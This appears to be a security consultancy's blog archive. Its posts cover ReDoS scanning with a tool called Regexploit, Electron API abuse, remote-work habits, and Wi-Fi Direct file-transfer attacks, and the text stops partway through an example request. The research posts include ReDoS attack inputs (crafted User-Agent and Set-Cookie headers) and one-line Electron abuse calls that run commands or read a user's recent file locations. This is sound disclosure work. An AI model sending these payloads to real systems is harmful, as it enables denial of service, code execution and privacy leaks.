Regexploit: DoS-able Regular Expressions

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has proven extremely effective, uncovering many vulnerabilities across popular npm, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.


To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)
That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.


$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+


until it successfully matches a dot - $1="123.456"


The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.


Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.


OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.


$2="456.789" but now there’s no dot! That can’t be the correct group 2…


Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
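Assuming the deliberately silly version-number regex is of the form `(.+)\.(.+)\.(.+)` (inferred from the walkthrough above), the whole dance can be reproduced in a couple of lines:

```python
import re

# Assumed form of the deliberately inefficient version-number regex:
# three greedy "dot-any" capture groups separated by literal dots.
VERSION = re.compile(r"(.+)\.(.+)\.(.+)")

# After all the backtracking described above, the engine settles on:
print(VERSION.match("123.456.789").groups())  # ('123', '456', '789')
```

Every one of the intermediate attempts in the walkthrough happens inside that single `match()` call.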

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like Node.js, the event loop will be blocked, stalling all timers, awaits, requests and responses until the regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

[A-Z]+\d+[^\);]+)[^\);]*\)
Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).
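The ½(N-1)N figure is easy to sanity-check by brute force (the helper name below is ours):

```python
def digit_splits(n):
    """Count the ways a run of n digits can be split between the
    overlapping repeats \\d+ (>= 1 chars), [^);]+ (>= 1 chars) and
    [^);]* (>= 0 chars)."""
    return sum(1
               for a in range(1, n + 1)       # digits taken by \d+
               for b in range(1, n - a + 1))  # digits taken by [^);]+
                                              # the rest go to [^);]*

# Matches the closed form (1/2)(N-1)N:
for n in (2, 5, 10, 100):
    assert digit_splits(n) == (n - 1) * n // 2
```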

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.


Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.
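The difference between the two classes is easy to demonstrate with Python’s backtracking `re` engine (inputs kept deliberately short so the exponential case finishes quickly):

```python
import re

# Exponential: nested repetition plus a 'b' that never arrives, so
# every grouping of the a's is tried (~2**15 paths for 16 a's).
assert re.match(r"(a+)+b", "a" * 16) is None

# "Only" polynomial: three overlapping repeats. Far fewer paths at this
# size, but still enough to hurt on long inputs.
assert re.match(r"a+a+a+b", "a" * 200) is None
```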

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the API) to find out.

pypi / npm downloader

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.


The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse languages such as Markdown, CSS, Matlab or SVG is fraught with danger. These languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/ #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.
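To see it locally, here is a runnable reconstruction of the pattern (transcribed from cpython’s http.cookiejar before the fix, so treat it as a close approximation), with the padding kept far shorter than 65506 spaces so it terminates promptly:

```python
import re

# Reconstruction of the vulnerable LOOSE_HTTP_DATE_RE: three \s* runs
# separated by optional groups give cubic backtracking on failure.
LOOSE_HTTP_DATE_RE = re.compile(
    r"""^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$""", re.X)

# A deprecated-format date still matches...
assert LOOSE_HTTP_DATE_RE.search("08-Jan-2021 23:20:00 GMT")
# ...while the Regexploit-style payload backtracks heavily and fails.
assert LOOSE_HTTP_DATE_RE.search("0 a 0" + " " * 40 + "0") is None
```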

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions. (Sorry, I wanted to shoehorn this comic in somewhere.)

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regexp package follows the RE2 design and does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.


Many tiny regexes

In Ruby, the standard library contains StringScanner, which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.
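The same idea can be sketched in Python with small anchored regexes that consume the input token by token and never reconsider text that has already been matched (a simplified illustration, not the http-cookie gem’s actual grammar):

```python
import re

NAME  = re.compile(r"[ \t]*([^=;, \t]+)")
EQVAL = re.compile(r"[ \t]*=[ \t]*([^;]*)")
SEP   = re.compile(r"[ \t]*;")

def parse_cookie_pairs(s):
    pos, out = 0, []
    while pos < len(s):
        m = NAME.match(s, pos)          # anchored at pos: tiny regex,
        if not m:                       # no cross-token backtracking
            break
        name, pos, value = m.group(1), m.end(), None
        if (m := EQVAL.match(s, pos)):
            value, pos = m.group(1), m.end()
        out.append((name, value))
        if (m := SEP.match(s, pos)):
            pos = m.end()
        else:
            break
    return out

assert parse_cookie_pairs("a=1; b=2; secure") == [
    ("a", "1"), ("b", "2"), ("secure", None)]
```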

Gotta catch ‘em all 🐛🐞🦠

Electron APIs Misuse: An Attacker’s First Choice

ElectronJS is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending Electron’s somewhat deserved reputation as a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years, we’ve committed to helping developers secure their applications by researching different attack surfaces.

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8) approximately quarterly. Such an ambitious versioning schedule will also increase the number and frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionality is certainly desirable, new framework APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Electron Hardened

Such interfaces may be exposed to the renderer, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron')
shell.openExternal('file:///Applications/') // illustrative URI: launches Calculator on macOS

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing the app object to the renderer. The app object controls the application’s entire event lifecycle and is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

Taking the first function by way of example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including an execPath property that will be executed on relaunch instead of the current app, along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands:

app.relaunch({args: [], execPath: "/System/Applications/"});

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.


Another frequently exposed module is systemPreferences. This API is used to get system preferences and emit system events, and it can therefore be abused to leak multiple pieces of information about the user’s behavior, their operating system activity, and usage patterns. The metadata extracted through the module could then be abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods can be used to subscribe to native macOS notifications. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The callback specified would be invoked any time a distributed notification was broadcast by any app. On macOS Catalina and Big Sur, even sandboxed applications can still sniff distributed notifications by registering to receive every notification of interest by name. As a result, many sensitive events can be sniffed, including but not limited to:

  • Screen locks/unlocks
  • Screen saver start/stop
  • Bluetooth activity/HID Devices
  • Volume (USB, etc) mount/unmount
  • Network activity
  • User file downloads
  • Newly Installed Applications
  • Opened Source Code Files
  • Applications in Use
  • Loaded Kernel Extensions
  • …and more, from any installed application, including any sensitive information carried in the notifications. Distributed notifications are public by design, and it was never correct to put sensitive information in them.

The latest NSDistributedNotificationCenter API also seems to have intermittent problems with Big Sur and sandboxed applications, so we expect to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of a key in NSUserDefaults, a simple macOS storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to read the application’s or the global preferences. An attacker may abuse the API to retrieve sensitive information, including the user’s location and filesystem resources. As a demonstration, getUserDefault can be used to obtain personal details of the targeted application’s user:

  • User’s most recent locations on the file system
    > Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
    (5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/", "~/Desktop/Invoices"]
  • User’s selected geographic location
    (10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]

Complementarily, the setUserDefault method can be weaponized to set defaults in the application preferences of the target application. Before Electron v8.3.0 [1], [2], these methods could only get or set NSUserDefaults keys in the standard suite.


A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.


Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/, Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))
    return;

  XDGOpen(dir.value(), false, platform_util::OpenCallback());
}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (xdg-open manual page).

Because of the inherent time-of-check to time-of-use (TOCTOU) race condition between the directory existence check and the launch with xdg-open, an attacker could run an executable of choice by replacing the checked directory with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to exploit in the context of an insecure Electron renderer, it is certainly a potential step in a more complex vulnerability chain.
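The race has the classic check-then-use shape, which can be sketched language-agnostically (the function and the injected opener below are illustrative, not Electron code):

```python
import os
import tempfile

def show_item_in_folder(full_path, opener):
    d = os.path.dirname(full_path)
    if not os.path.isdir(d):   # time of check
        return False
    # An attacker who swaps `d` between the check above and the call
    # below controls what `opener` (think xdg-open) is invoked on.
    opener(d)                  # time of use
    return True

assert show_item_in_folder("/nonexistent_dir_xyz/file.txt", print) is False
assert show_item_in_folder(os.path.join(tempfile.gettempdir(), "f"),
                           lambda d: None) is True
```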

On Windows (/shell/common/, the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL, /* ... */
                                 NULL, &dir_item, NULL);
  /* ... */
  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
                                  /* ... */);
  if (FAILED(hr)) {
    if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);
    }
  }
}
Under normal circumstances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fall-back mechanism because the call mysteriously fails with a “file not found” error on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” verb launches the specified file or application. If the file is not executable, its associated application is launched.

While the exploitability of these quirks is up for discussion, these examples showcase how innocuous-looking APIs can introduce OS-dependent security risks. In fact, Chromium has since refactored the code in question to avoid the use of xdg-open altogether and leverage D-Bus instead.

The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to securing the ElectronJS ecosystem and improving Electronegativity.

Psychology of Remote Work

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to change our habits almost overnight. In all probability, no one could have predicted that the office would suddenly be “moved” into the living room. Remote work has been a hot topic for many years, but the current situation has certainly accelerated its adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

5 standard rules we follow and 7 myths that we believe are false


Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to physically separate the workplace from the rest of the house somehow, e.g. with a screen, a small bookcase or a curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk; it will also be easier to mobilize yourself for a specific activity. Also, make sure that your household, especially young children, do not play in your “office area”. It is best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the work place. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient - for example by setting up bigger screens and ready to use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial, and a break brings a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside, but outdoor physical activities are very important to keep our minds fresh, and a set of new endorphins is always welcome. As anecdotal evidence, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shutdown email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.


Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and deliver a high quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. While employing people for our company, we look at both technical and project management skills. According to Jason Fried and David Heinemeier Hansson, the 37signals co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being over concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with a device’s built-in hardware, allowing devices to connect directly to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, a huge majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendors alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the recurrent design pattern shared by these solutions and the issues we found in each of the three implementations.

A Recurrent Design Pattern

On the majority of OEM solutions, mobile file transfer applications will spawn two servers:

  • A File Transfer Controller or Client (FTC), that will manage the majority of the pairing and transfer control flow
  • A File Transfer Server (FTS), that will check a session’s validity and serve the intended shared file

These two services are used for device discovery, pairing and session handling, authorization requests, and file transport. They are usually implemented as classes of a shared parent application that orchestrates the entire transfer. These components are responsible for:

  1. Creating the Wi-Fi Direct network
  2. Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
  3. Issuing a UPnP remote procedure call to create a transfer request with another peer
  4. Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location
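The four steps above map onto ordinary HTTP traffic. As a rough illustration, a generic UPnP SOAP action call (step 3) can be issued from any HTTP client; the helper below is a sketch of our own, not taken from any vendor's code, and the service/action names are supplied by the caller:

```python
import urllib.request


def upnp_action(host: str, port: int, control_path: str,
                service: str, action: str, body_xml: str) -> bytes:
    """Sketch of a generic UPnP SOAP action request (step 3 above)."""
    envelope = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{service}">{body_xml}</u:{action}></s:Body>'
        '</s:Envelope>'
    )
    req = urllib.request.Request(
        f"http://{host}:{port}{control_path}",
        data=envelope.encode(),
        headers={
            "Content-Type": 'text/xml; charset="utf-8"',
            # SOAPACTION ties the HTTP request to the UPnP action being invoked
            "SOAPACTION": f'"{service}#{action}"',
        },
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()
```

The control path and service URN are the ones announced by the peer in its /description.xml during the discovery phase.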

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application on the user’s device that holds android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on either the local or the remote device, opening the door to a multitude of attacks.
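To make this concrete, any unprivileged app could confirm that these services are reachable with a plain TCP probe. The snippet below is a minimal sketch using the vendor ports discussed in this post; nothing vendor-specific beyond the port numbers is assumed:

```python
import socket

# FTS/FTC ports mentioned in this post (LG: 54003/55003, Huawei: 8058/33003)
CANDIDATE_PORTS = [54003, 55003, 8058, 33003]


def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP service is listening on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def find_transfer_services(host: str) -> list:
    # Any app holding android.permission.INTERNET can run this against
    # the local device (127.0.0.1) or a peer on the p2p-wlan0-0 subnet.
    return [p for p in CANDIDATE_PORTS if probe(host, p)]
```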

LG SmartShare Beam

SmartShare is a stock LG solution to connect their phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS (FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned, listening on ports 54003 and 55003 respectively.

By way of example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"

<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSession xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
